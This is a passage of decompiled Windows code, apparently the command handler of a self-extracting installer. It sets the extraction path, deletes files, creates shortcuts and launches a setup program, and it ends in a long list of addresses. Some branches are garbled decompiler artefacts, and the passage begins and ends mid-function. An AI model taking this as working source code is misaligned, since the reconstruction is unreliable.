						__eax = __ebp - 0x10c;
						__eax = E003E1FBB(__ebp - 0x10c, L"HIDE");
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__edi = __edi & __eax;
						__eax = __ebp - 0x10c;
						__eax = E003E1FBB(__ebp - 0x10c, L"MAX");
						if(__eax == 0) {
							__edi = 3;
						}
						__eax = __ebp - 0x10c;
						__eax = E003E1FBB(__ebp - 0x10c, L"MIN");
						if(__eax == 0) {
							__edi = 6;
						}
						_push(0x64);
						__eax = __ebp - 0x10c;
						_push(__ebp - 0x10c);
						_push(__esi);
						__esi = E003EAF98();
						if(__esi != 0) {
							continue;
						} else {
							goto L95;
						}
					}
					goto L95;
					L96:
					if( *((intOrPtr*)(_t304 + 0x10)) != 5) {
						L99:
						if( *((intOrPtr*)(_t304 + 0x10)) != 4) {
							while(1) {
								L175:
								_push(0x1000);
								_t213 = _t304 - 0x15; // 0xffffa75f
								_t214 = _t304 - 0xd; // 0xffffa767
								_t215 = _t304 - 0x588c; // 0xffff4ee8
								_t216 = _t304 - 0xf894; // 0xfffeaee0
								_push( *((intOrPtr*)(_t304 + 0xc)));
								_t226 = E003EB314(_t295, _t304);
								_t279 =  *((intOrPtr*)(_t304 + 0x10));
								 *((intOrPtr*)(_t304 + 0xc)) = _t226;
								if(_t226 != 0) {
									_t227 = _t304 - 0x588c;
									_t299 = _t304 - 0x1b894;
									_t296 = 6;
									goto L2;
								} else {
									break;
								}
								L4:
								while(E003E1FBB(_t304 - 0xf894,  *((intOrPtr*)(0x40e744 + _t300 * 4))) != 0) {
									_t300 = _t300 + 1;
									if(_t300 < 0xe) {
										continue;
									} else {
										goto L175;
									}
								}
								if(_t300 > 0xd) {
									continue;
								}
								L8:
								switch( *((intOrPtr*)(_t300 * 4 +  &M003ED41B))) {
									case 0:
										L9:
										__eflags = _t279 - 2;
										if(_t279 == 2) {
											_t295 = 0x800;
											E003EA64D(_t304 - 0x788c, 0x800);
											E003DA544(E003DBDF3(__eflags, _t304 - 0x788c, _t304 - 0x588c, _t304 - 0xd894, 0x800), _t279, _t304 - 0x8894, _t300);
											 *(_t304 - 4) = 0;
											E003DA67E(_t304 - 0x8894, _t304 - 0xd894);
											E003D6EDB(_t304 - 0x388c);
											while(1) {
												L23:
												_push(0);
												_t241 = E003DA5D1(_t304 - 0x8894, _t304 - 0x388c);
												__eflags = _t241;
												if(_t241 == 0) {
													break;
												}
												L11:
												SetFileAttributesW(_t304 - 0x388c, 0);
												__eflags =  *(_t304 - 0x2880);
												if(__eflags == 0) {
													L16:
													_t245 = GetFileAttributesW(_t304 - 0x388c);
													__eflags = _t245 - 0xffffffff;
													if(_t245 == 0xffffffff) {
														continue;
													}
													L17:
													_t247 = DeleteFileW(_t304 - 0x388c);
													__eflags = _t247;
													if(_t247 != 0) {
														continue;
													} else {
														_t302 = 0;
														_push(0);
														goto L20;
														L20:
														E003D4092(_t304 - 0x1044, _t295, L"%s.%d.tmp", _t304 - 0x388c);
														_t306 = _t306 + 0x14;
														_t252 = GetFileAttributesW(_t304 - 0x1044);
														__eflags = _t252 - 0xffffffff;
														if(_t252 != 0xffffffff) {
															_t302 = _t302 + 1;
															__eflags = _t302;
															_push(_t302);
															goto L20;
														} else {
															_t255 = MoveFileW(_t304 - 0x388c, _t304 - 0x1044);
															__eflags = _t255;
															if(_t255 != 0) {
																MoveFileExW(_t304 - 0x1044, 0, 4);
															}
															continue;
														}
													}
												}
												L12:
												E003DB991(__eflags, _t304 - 0x788c, _t304 - 0x1044, _t295);
												E003DB690(__eflags, _t304 - 0x1044, _t295);
												_t303 = E003F3E13(_t304 - 0x788c);
												__eflags = _t303 - 4;
												if(_t303 < 4) {
													L14:
													_t266 = E003DBDB4(_t304 - 0x588c);
													__eflags = _t266;
													if(_t266 != 0) {
														break;
													}
													L15:
													_t269 = E003F3E13(_t304 - 0x388c);
													__eflags = 0;
													 *((short*)(_t304 + _t269 * 2 - 0x388a)) = 0;
													E003EFFF0(_t295, _t304 - 0x44, 0, 0x1e);
													_t306 = _t306 + 0x10;
													 *((intOrPtr*)(_t304 - 0x40)) = 3;
													_push(0x14);
													_pop(_t272);
													 *((short*)(_t304 - 0x34)) = _t272;
													 *((intOrPtr*)(_t304 - 0x3c)) = _t304 - 0x388c;
													_push(_t304 - 0x44);
													 *0x43307c();
													goto L16;
												}
												L13:
												_t277 = E003F3E13(_t304 - 0x1044);
												__eflags = _t303 - _t277;
												if(_t303 > _t277) {
													goto L15;
												}
												goto L14;
											}
											L24:
											 *(_t304 - 4) =  *(_t304 - 4) | 0xffffffff;
											E003DA55A(_t304 - 0x8894);
										}
										goto L175;
									case 1:
										L25:
										__eflags = __ebx;
										if(__ebx != 0) {
											goto L175;
										} else {
											__eax =  *0x42fc94;
											__eflags = __eax;
											__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
											__eflags = __eax;
											if(__eax != 0) {
												__eax =  *0x42fc94;
												_pop(__ecx);
												_pop(__ecx);
											}
											__bh =  *((intOrPtr*)(__ebp - 0xd));
											__eflags = __bh;
											if(__eflags == 0) {
												__eax = __ebp + 0xc;
												_push(__ebp + 0xc);
												__esi = E003EB48E(__ecx, __edx, __eflags);
												__eax =  *0x42fc94;
											} else {
												__esi = __ebp - 0x588c;
											}
											__eflags = __bl;
											if(__bl == 0) {
												__edi = __eax;
											}
											L33:
											__eax = E003F3E13(__esi);
											__eax = __eax + __edi;
											_push(__eax);
											_push( *0x42fc94);
											__eax = E003F3E3E(__ecx, __edx);
											__esp = __esp + 0xc;
											__eflags = __eax;
											if(__eax == 0) {
												L37:
												__eflags = __bh;
												if(__bh == 0) {
													__eax = L003F3E2E(__esi);
												}
												goto L175;
											}
											L34:
											 *0x42fc94 = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											L36:
											__eax = E003F7686(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
											goto L37;
										}
									case 2:
										L39:
										__eflags = __ebx;
										if(__ebx == 0) {
											__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
										}
										goto L175;
									case 3:
										L41:
										__eflags = __ebx;
										if(__ebx != 0) {
											goto L175;
										}
										L42:
										__eflags =  *0x41a472 - __di;
										if( *0x41a472 != __di) {
											goto L175;
										}
										L43:
										__eax = 0;
										__edi = __ebp - 0x588c;
										_push(0x22);
										 *(__ebp - 0x1044) = __ax;
										_pop(__eax);
										__eflags =  *(__ebp - 0x588c) - __ax;
										if( *(__ebp - 0x588c) == __ax) {
											__edi = __ebp - 0x588a;
										}
										__eax = E003F3E13(__edi);
										__esi = 0x800;
										__eflags = __eax - 0x800;
										if(__eax >= 0x800) {
											goto L175;
										} else {
											L46:
											__eax =  *__edi & 0x0000ffff;
											_push(0x5c);
											_pop(__ecx);
											__eflags = ( *__edi & 0x0000ffff) - 0x2e;
											if(( *__edi & 0x0000ffff) != 0x2e) {
												L50:
												__eflags = __ax - __cx;
												if(__ax == __cx) {
													L62:
													__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, __esi);
													__ebx = 0;
													__eflags = 0;
													L63:
													_push(0x22);
													_pop(__eax);
													__eax = __ebp - 0x1044;
													__eax = E003F279B(__ebp - 0x1044, __ebp - 0x1044);
													_pop(__ecx);
													_pop(__ecx);
													__eflags = __eax;
													if(__eax != 0) {
														__eflags =  *(__eax + 2) - __bx;
														if( *(__eax + 2) == __bx) {
															__ecx = 0;
															__eflags = 0;
															 *__eax = __cx;
														}
													}
													__eax = __ebp - 0x1044;
													__edi = 0x41a472;
													E003E0602(0x41a472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
													__eax = E003EB1BE(__ebp - 0x1044, __esi);
													__esi = GetDlgItem( *(__ebp + 8), 0x66);
													__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
													__eax = SendMessageW(__esi, 0x143, __ebx, 0x41a472); // executed
													__eax = __ebp - 0x1044;
													__eax = E003F3E49(__ebp - 0x1044, 0x41a472, __eax);
													_pop(__ecx);
													_pop(__ecx);
													__eflags = __eax;
													if(__eax != 0) {
														__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
													}
													goto L175;
												}
												L51:
												__eflags = __ax;
												if(__ax == 0) {
													L53:
													__eax = __ebp - 0x1c;
													__ebx = 0;
													_push(__ebp - 0x1c);
													_push(1);
													_push(0);
													_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
													_push(0x80000002);
													__eax =  *0x433028();
													__eflags = __eax;
													if(__eax == 0) {
														__eax = __ebp - 0x14;
														 *(__ebp - 0x14) = 0x1000;
														_push(__ebp - 0x14);
														__eax = __ebp - 0x1044;
														_push(__ebp - 0x1044);
														__eax = __ebp - 0x24;
														_push(__ebp - 0x24);
														_push(0);
														_push(L"ProgramFilesDir");
														_push( *(__ebp - 0x1c));
														__eax =  *0x433024();
														_push( *(__ebp - 0x1c));
														 *0x433008() =  *(__ebp - 0x14);
														__ecx = 0x7ff;
														__eax =  *(__ebp - 0x14) >> 1;
														__eflags = __eax - 0x7ff;
														if(__eax >= 0x7ff) {
															__eax = 0x7ff;
														}
														__ecx = 0;
														__eflags = 0;
														 *(__ebp + __eax * 2 - 0x1044) = __cx;
													}
													__eflags =  *(__ebp - 0x1044) - __bx;
													if( *(__ebp - 0x1044) != __bx) {
														__eax = __ebp - 0x1044;
														__eax = E003F3E13(__ebp - 0x1044);
														_push(0x5c);
														_pop(__ecx);
														__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
														if(__eflags != 0) {
															__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, "\\", __esi);
														}
													}
													__esi = E003F3E13(__edi);
													__eax = __ebp - 0x1044;
													__eflags = __esi - 0x7ff;
													__esi = 0x800;
													if(__eflags < 0) {
														__ebp - 0x1044 = E003E05DA(__eflags, __ebp - 0x1044, __edi, 0x800);
													}
													goto L63;
												}
												L52:
												__eflags =  *((short*)(__edi + 2)) - 0x3a;
												if( *((short*)(__edi + 2)) == 0x3a) {
													goto L62;
												}
												goto L53;
											}
											L47:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
											if( *((intOrPtr*)(__edi + 2)) != __cx) {
												goto L51;
											}
											L48:
											__edi = __edi + 4;
											__ebx = 0;
											__eflags =  *__edi - __bx;
											if( *__edi == __bx) {
												goto L175;
											}
											L49:
											__ebp - 0x1044 = E003E0602(__ebp - 0x1044, __edi, 0x800);
											goto L63;
										}
									case 4:
										L68:
										__eflags =  *0x41a46c - 1;
										__eflags = __eax - 0x41a46c;
										 *__edi =  *__edi + __ecx;
										__eflags =  *(__edx + 7) & __al;
										 *__eax =  *__eax + __al;
										__eflags =  *__eax;
									case 5:
										L73:
										__eax =  *(__ebp - 0x588c) & 0x0000ffff;
										__ecx = 0;
										__eax =  *(__ebp - 0x588c) & 0x0000ffff;
										__eflags = __eax;
										if(__eax == 0) {
											L80:
											 *0x418457 = __cl;
											 *0x418460 = 1;
											goto L175;
										}
										L74:
										__eax = __eax - 0x30;
										__eflags = __eax;
										if(__eax == 0) {
											L78:
											 *0x418457 = __cl;
											L79:
											 *0x418460 = __cl;
											goto L175;
										}
										L75:
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax == 0) {
											goto L80;
										}
										L76:
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax != 0) {
											goto L175;
										}
										L77:
										 *0x418457 = 1;
										goto L79;
									case 6:
										goto L0;
									case 7:
										L106:
										__eflags = __ebx - 1;
										if(__eflags != 0) {
											L123:
											__eflags = __ebx - 7;
											if(__ebx == 7) {
												__eflags =  *0x41a46c - __edi;
												if( *0x41a46c == __edi) {
													 *0x41a46c = 2;
												}
												 *0x419468 = 1;
											}
											goto L175;
										}
										L107:
										__eax = __ebp - 0x788c;
										__edi = 0x800;
										GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
										__eax = E003DB690(__eflags, __ebp - 0x788c, 0x800);
										__ebx = 0;
										__esi = 0;
										_push(0);
										while(1) {
											L109:
											_push( *0x40e724);
											__ebp - 0x788c = E003D4092(0x41946a, __edi, L"%s%s%u", __ebp - 0x788c);
											__eax = E003DA231(0x41946a);
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L108:
											__esi =  &(__esi->i);
											__eflags = __esi;
											_push(__esi);
										}
										L110:
										__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x41946a);
										__eflags =  *(__ebp - 0x588c) - __bx;
										if( *(__ebp - 0x588c) == __bx) {
											goto L175;
										}
										L111:
										__eflags =  *0x41c575 - __bl;
										if( *0x41c575 != __bl) {
											goto L175;
										}
										L112:
										__eax = 0;
										 *(__ebp - 0x444) = __ax;
										__eax = __ebp - 0x588c;
										_push(0x2c);
										_push(__ebp - 0x588c);
										__eax = E003F22C6(__ecx);
										_pop(__ecx);
										_pop(__ecx);
										__eflags = __eax;
										if(__eax != 0) {
											L119:
											__eflags =  *(__ebp - 0x444) - __bx;
											if( *(__ebp - 0x444) == __bx) {
												__ebp - 0x1b894 = __ebp - 0x588c;
												E003E0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
												__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
											}
											__ebp - 0x588c = E003EADD2(__ebp - 0x588c);
											__eax = 0;
											 *(__ebp - 0x488c) = __ax;
											__ebp - 0x444 = __ebp - 0x588c;
											__eax = E003EA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
											__eflags = __eax - 6;
											if(__eax != 6) {
												__eax = 0;
												 *0x418454 = 1;
												 *0x41946a = __ax;
												__eax = EndDialog( *(__ebp + 8), 1);
											}
											goto L175;
										}
										L113:
										__ax =  *(__ebp - 0x588c);
										__esi = __ebx;
										__eflags = __ax;
										if(__ax == 0) {
											goto L119;
										}
										L114:
										__ecx = __ax & 0x0000ffff;
										while(1) {
											L115:
											__eflags = __cx - 0x40;
											if(__cx == 0x40) {
												break;
											}
											L116:
											__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
											__esi =  &(__esi->i);
											__ecx = __eax;
											__eflags = __ax;
											if(__ax != 0) {
												continue;
											}
											L117:
											goto L119;
										}
										L118:
										__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
										__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x444, 0x200);
										__eax = 0;
										__eflags = 0;
										 *(__ebp + __esi * 2 - 0x588c) = __ax;
										goto L119;
									case 8:
										L127:
										__eflags = __ebx - 3;
										if(__ebx == 3) {
											__eflags =  *(__ebp - 0x588c) - __di;
											if(__eflags != 0) {
												__eax = __ebp - 0x588c;
												_push(__ebp - 0x588c);
												__eax = E003F7625(__ebx, __edi);
												_pop(__ecx);
												 *0x42fc9c = __eax;
											}
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											 *0x42fc98 = E003EB48E(__ecx, __edx, __eflags);
										}
										 *0x41c576 = 1;
										goto L175;
									case 9:
										L132:
										__eflags = __ebx - 6;
										if(__ebx != 6) {
											goto L175;
										}
										L133:
										__eax = 0;
										 *(__ebp - 0x2844) = __ax;
										__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
										__eax = E003F79E9( *(__ebp - 0x1b894) & 0x0000ffff);
										__eflags = __eax - 0x50;
										if(__eax == 0x50) {
											 *(__ebp - 0x14) = 2;
											__eax = 0x42cb82;
										} else {
											__eflags = __eax - 0x54;
											if(__eax == 0x54) {
												 *(__ebp - 0x14) = 7;
												__eax = 0x42bb82;
											} else {
												 *(__ebp - 0x14) = 0x10;
												__eax = 0x42db82;
											}
										}
										__esi = 0x800;
										__ebp - 0x2844 = E003E0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
										__eax = 0;
										 *(__ebp - 0x9894) = __ax;
										 *(__ebp - 0x1844) = __ax;
										__ebp - 0x19894 = __ebp - 0x688c;
										__eax = E003E0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
										_push(0x22);
										_pop(__ebx);
										__eflags =  *(__ebp - 0x688c) - __bx;
										if( *(__ebp - 0x688c) != __bx) {
											L141:
											__ebp - 0x688c = E003DA231(__ebp - 0x688c);
											__eflags = __al;
											if(__al != 0) {
												goto L160;
											}
											L142:
											__ax =  *(__ebp - 0x688c);
											__esi = __ebp - 0x688c;
											__ebx = __edi;
											__eflags = __ax;
											if(__ax == 0) {
												L159:
												__esi = 0x800;
												goto L160;
											}
											L143:
											__edi = __ax & 0x0000ffff;
											do {
												L144:
												_push(0x20);
												_pop(__eax);
												__eflags = __di - __ax;
												if(__di == __ax) {
													L146:
													__eax = 0;
													__esi->i = __ax;
													__ebp - 0x688c = E003DA231(__ebp - 0x688c);
													__eflags = __al;
													if(__al == 0) {
														L155:
														__esi->i = __di;
														goto L156;
													}
													L147:
													__ebp - 0x688c = E003DA243(__ebp - 0x688c);
													__eax = E003DA28F(__eax);
													__eflags = __al;
													if(__al != 0) {
														goto L155;
													}
													L148:
													_push(0x2f);
													_pop(__ecx);
													__eax =  &(__esi->i);
													__ebx = __esi;
													__eflags = __di - __cx;
													if(__di != __cx) {
														L150:
														_push(0x20);
														__esi = __eax;
														_pop(__eax);
														while(1) {
															L152:
															__eflags = __esi->i - __ax;
															if(__esi->i != __ax) {
																break;
															}
															L151:
															__esi =  &(__esi->i);
															__eflags = __esi;
														}
														L153:
														__ecx = __ebp - 0x1844;
														__eax = __esi;
														__edx = 0x400;
														L154:
														__eax = E003E0602(__ecx, __eax, __edx);
														 *__ebx = __di;
														goto L156;
													}
													L149:
													 *(__ebp - 0x1844) = __cx;
													__edx = 0x3ff;
													__ecx = __ebp - 0x1842;
													goto L154;
												}
												L145:
												_push(0x2f);
												_pop(__eax);
												__eflags = __di - __ax;
												if(__di != __ax) {
													goto L156;
												}
												goto L146;
												L156:
												__esi =  &(__esi->i);
												__eax = __esi->i & 0x0000ffff;
												__edi = __esi->i & 0x0000ffff;
												__eflags = __ax;
											} while (__ax != 0);
											__esi = 0x800;
											__eflags = __ebx;
											if(__ebx != 0) {
												__eax = 0;
												 *__ebx = __ax;
											}
											goto L160;
										} else {
											L139:
											__ebp - 0x19892 = __ebp - 0x688c;
											E003E0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
											_push(__ebx);
											_push(__ebp - 0x688a);
											__eax = E003F22C6(__ecx);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ecx = 0;
												 *__eax = __cx;
												__ebp - 0x1844 = E003E0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
											}
											L160:
											__eflags =  *((short*)(__ebp - 0x11894));
											if( *((short*)(__ebp - 0x11894)) != 0) {
												__ebp - 0x9894 = __ebp - 0x11894;
												__eax = E003DB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
											}
											__ebp - 0xb894 = __ebp - 0x688c;
											__eax = E003DB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
											__eflags =  *(__ebp - 0x2844);
											if(__eflags == 0) {
												__ebp - 0x2844 = E003EB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
											}
											__ebp - 0x2844 = E003DB690(__eflags, __ebp - 0x2844, __esi);
											__eflags =  *((short*)(__ebp - 0x17894));
											if(__eflags != 0) {
												__ebp - 0x17894 = __ebp - 0x2844;
												E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
												__eax = E003DB690(__eflags, __ebp - 0x2844, __esi);
											}
											__ebp - 0x2844 = __ebp - 0xc894;
											__eax = E003E0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
											__eflags =  *(__ebp - 0x13894);
											__eax = __ebp - 0x13894;
											if(__eflags == 0) {
												__eax = __ebp - 0x19894;
											}
											__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
											__eax = __ebp - 0x2844;
											__eflags = E003DB92D(__ebp - 0x2844);
											if(__eflags == 0) {
												L170:
												__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
												goto L171;
											} else {
												L169:
												__eflags = __eax;
												if(__eflags == 0) {
													L171:
													__ebx = 0;
													__ebp - 0x2844 = E003DA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
													__ebp - 0xb894 = __ebp - 0xa894;
													E003E0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
													__eax = E003DC2E4(__eflags, __ebp - 0xa894);
													__esi =  *(__ebp - 0x1844) & 0x0000ffff;
													__eax = __ebp - 0x1844;
													__edx =  *(__ebp - 0x9894) & 0x0000ffff;
													__edi = __ebp - 0xa894;
													__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
													__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
													asm("sbb esi, esi");
													__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
													__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
													__eax = __ebp - 0x9894;
													asm("sbb edx, edx");
													__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
													__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
													__eax = __ebp - 0x15894;
													asm("sbb ecx, ecx");
													__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
													 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
													asm("sbb eax, eax");
													 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
													__ebp - 0xb894 = E003EA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
													__eflags =  *(__ebp - 0xc894) - __bx;
													if( *(__ebp - 0xc894) != __bx) {
														_push(0);
														__eax = __ebp - 0xc894;
														_push(__ebp - 0xc894);
														_push(5);
														_push(0x1000);
														__eax =  *0x43308c();
													}
													goto L175;
												}
												goto L170;
											}
										}
									case 0xa:
										L173:
										__eflags = __ebx - 7;
										if(__ebx == 7) {
											 *0x41a470 = 1;
										}
										goto L175;
									case 0xb:
										L81:
										__eax =  *(__ebp - 0x588c) & 0x0000ffff;
										__eax = E003F79E9( *(__ebp - 0x588c) & 0x0000ffff);
										__eflags = __eax - 0x46;
										if(__eax == 0x46) {
											 *0x418461 = 1;
										} else {
											__eflags = __eax - 0x55;
											if(__eax == 0x55) {
												 *0x418462 = 1;
											} else {
												__eax = 0;
												 *0x418461 = __al;
												 *0x418462 = __al;
											}
										}
										goto L175;
									case 0xc:
										L103:
										 *0x427b7a = 1;
										__eax = __eax + 0x427b7a;
										_t117 = __esi + 0x39;
										 *_t117 =  *(__esi + 0x39) + __esp;
										__eflags =  *_t117;
										__ebp = 0xffffa774;
										if( *_t117 != 0) {
											_t119 = __ebp - 0x588c; // 0xffff4ee8
											__eax = _t119;
											 *0x40e728 = E003E1FA7(_t119);
										}
										goto L175;
								}
								L2:
								_push(0x1000);
								_push(_t299);
								_push(_t227);
								_t227 = E003EAF98();
								_t299 = _t299 + 0x2000;
								_t296 = _t296 - 1;
								if(_t296 != 0) {
									goto L2;
								} else {
									_t300 = _t296;
									goto L4;
								}
							}
							L176:
							 *[fs:0x0] =  *((intOrPtr*)(_t304 - 0xc));
							return _t226;
						}
						L100:
						if(_t279 != 6) {
							goto L175;
						}
						L101:
						_push(0);
						L102:
						_push(_t295);
						_push(_t221);
						_push( *((intOrPtr*)(_t304 + 8)));
						E003ED78F(_t304);
						goto L175;
					}
					L97:
					if(_t279 != 9) {
						goto L175;
					}
					L98:
					_push(1);
					goto L102;
				}
			}












                0x003ecd58
                0x003ecd58
                0x003ecd58
                0x003ecd5a
                0x003ecd61
                0x003ecd62
                0x003ecd70
                0x003ecd72
                0x003ecd75
                0x00000000
                0x00000000
                0x003ecd7b
                0x003ecd7b
                0x003ecd83
                0x003ecd84
                0x003ecd89
                0x003ecd8a
                0x003ecd8d
                0x003ece22
                0x003ece22
                0x00000000
                0x003ece22
                0x003ecd93
                0x003ecd93
                0x003ecd93
                0x003ecd96
                0x003ecd99
                0x003ecd9b
                0x003ecd9e
                0x003ecda4
                0x003ecda6
                0x003ecda7
                0x003ecdad
                0x003ecdae
                0x003ecdb3
                0x003ecdb8
                0x00000000
                0x00000000
                0x003ecdba
                0x003ecdba
                0x003ecdbc
                0x003ecdbc
                0x003ecdc4
                0x00000000
                0x00000000
                0x003ecdc6
                0x003ecdcb
                0x003ecdd2
                0x003ecdd7
                0x003ecdde
                0x003ecde0
                0x003ecde2
                0x003ecde9
                0x003ecdf0
                0x003ecdf4
                0x003ecdf4
                0x003ecdfa
                0x003ece01
                0x003ece08
                0x003ece0c
                0x003ece0c
                0x003ece0d
                0x003ece0f
                0x003ece15
                0x003ece16
                0x003ece1c
                0x003ece20
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ece20
                0x00000000
                0x003ece25
                0x003ece29
                0x003ece38
                0x003ece3c
                0x003ed3d9
                0x003ed3d9
                0x003ed3d9
                0x003ed3de
                0x003ed3e2
                0x003ed3e6
                0x003ed3ed
                0x003ed3f4
                0x003ed3f7
                0x003ed3fc
                0x003ed3ff
                0x003ed404
                0x003ec795
                0x003ec79b
                0x003ec7a1
                0x003ec7a1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ec7bb
                0x003ec7d2
                0x003ec7d6
                0x00000000
                0x003ec7d8
                0x00000000
                0x003ec7d8
                0x003ec7d6
                0x003ec7e0
                0x00000000
                0x00000000
                0x003ec7e6
                0x003ec7e6
                0x00000000
                0x003ec7ed
                0x003ec7ed
                0x003ec7f0
                0x003ec7f6
                0x003ec803
                0x003ec829
                0x003ec83d
                0x003ec840
                0x003ec84b
                0x003ec98f
                0x003ec98f
                0x003ec98f
                0x003ec99d
                0x003ec9a2
                0x003ec9a4
                0x00000000
                0x00000000
                0x003ec855
                0x003ec85d
                0x003ec863
                0x003ec869
                0x003ec90f
                0x003ec916
                0x003ec91c
                0x003ec91f
                0x00000000
                0x00000000
                0x003ec921
                0x003ec928
                0x003ec92e
                0x003ec930
                0x00000000
                0x003ec932
                0x003ec932
                0x003ec934
                0x003ec935
                0x003ec939
                0x003ec94d
                0x003ec952
                0x003ec95c
                0x003ec962
                0x003ec965
                0x003ec937
                0x003ec937
                0x003ec938
                0x00000000
                0x003ec967
                0x003ec975
                0x003ec97b
                0x003ec97d
                0x003ec989
                0x003ec989
                0x00000000
                0x003ec97d
                0x003ec965
                0x003ec930
                0x003ec86f
                0x003ec87e
                0x003ec88b
                0x003ec89c
                0x003ec89f
                0x003ec8a2
                0x003ec8b5
                0x003ec8bc
                0x003ec8c1
                0x003ec8c3
                0x00000000
                0x00000000
                0x003ec8c9
                0x003ec8d0
                0x003ec8d5
                0x003ec8da
                0x003ec8e6
                0x003ec8eb
                0x003ec8ee
                0x003ec8f5
                0x003ec8f7
                0x003ec8f8
                0x003ec902
                0x003ec908
                0x003ec909
                0x00000000
                0x003ec909
                0x003ec8a4
                0x003ec8ab
                0x003ec8b1
                0x003ec8b3
                0x00000000
                0x00000000
                0x00000000
                0x003ec8b3
                0x003ec9aa
                0x003ec9aa
                0x003ec9b4
                0x003ec9b4
                0x00000000
                0x00000000
                0x003ec9be
                0x003ec9be
                0x003ec9c0
                0x00000000
                0x003ec9c6
                0x003ec9c6
                0x003ec9cb
                0x003ec9cd
                0x003ec9d0
                0x003ec9d2
                0x003ec9df
                0x003ec9e4
                0x003ec9e5
                0x003ec9e5
                0x003ec9e6
                0x003ec9e9
                0x003ec9eb
                0x003ec9f5
                0x003ec9f8
                0x003ec9fe
                0x003eca00
                0x003ec9ed
                0x003ec9ed
                0x003ec9ed
                0x003eca05
                0x003eca07
                0x003eca10
                0x003eca10
                0x003eca12
                0x003eca13
                0x003eca18
                0x003eca21
                0x003eca22
                0x003eca28
                0x003eca2d
                0x003eca30
                0x003eca32
                0x003eca4b
                0x003eca4b
                0x003eca4d
                0x003eca54
                0x003eca59
                0x00000000
                0x003eca4d
                0x003eca34
                0x003eca34
                0x003eca39
                0x003eca3b
                0x003eca3d
                0x003eca3d
                0x003eca3f
                0x003eca3f
                0x003eca42
                0x003eca44
                0x003eca49
                0x003eca4a
                0x00000000
                0x003eca4a
                0x00000000
                0x003eca5f
                0x003eca5f
                0x003eca61
                0x003eca71
                0x003eca71
                0x00000000
                0x00000000
                0x003eca7c
                0x003eca7c
                0x003eca7e
                0x00000000
                0x00000000
                0x003eca84
                0x003eca84
                0x003eca8b
                0x00000000
                0x00000000
                0x003eca91
                0x003eca91
                0x003eca93
                0x003eca99
                0x003eca9b
                0x003ecaa2
                0x003ecaa3
                0x003ecaaa
                0x003ecaac
                0x003ecaac
                0x003ecab3
                0x003ecab8
                0x003ecabe
                0x003ecac0
                0x00000000
                0x003ecac6
                0x003ecac6
                0x003ecac6
                0x003ecac9
                0x003ecacb
                0x003ecacc
                0x003ecacf
                0x003ecaf8
                0x003ecaf8
                0x003ecafb
                0x003ecbe0
                0x003ecbe9
                0x003ecbee
                0x003ecbee
                0x003ecbf0
                0x003ecbf0
                0x003ecbf2
                0x003ecbf4
                0x003ecbfb
                0x003ecc00
                0x003ecc01
                0x003ecc02
                0x003ecc04
                0x003ecc06
                0x003ecc0a
                0x003ecc0c
                0x003ecc0c
                0x003ecc0e
                0x003ecc0e
